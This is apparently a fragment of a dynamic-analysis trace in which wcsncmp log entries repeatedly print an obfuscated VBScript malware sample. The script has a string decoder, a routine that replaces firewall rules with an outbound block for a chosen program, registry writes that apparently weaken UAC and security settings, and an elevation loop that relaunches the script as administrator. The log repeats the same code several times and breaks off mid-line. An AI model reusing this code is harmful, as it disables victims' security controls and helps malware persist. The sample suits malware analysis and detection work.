bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.301] wcsncmp (_String1="-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0226.301] wcsncmp (_String1="1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.301] wcsncmp (_String1=")\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.301] wcsncmp (_String1="\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 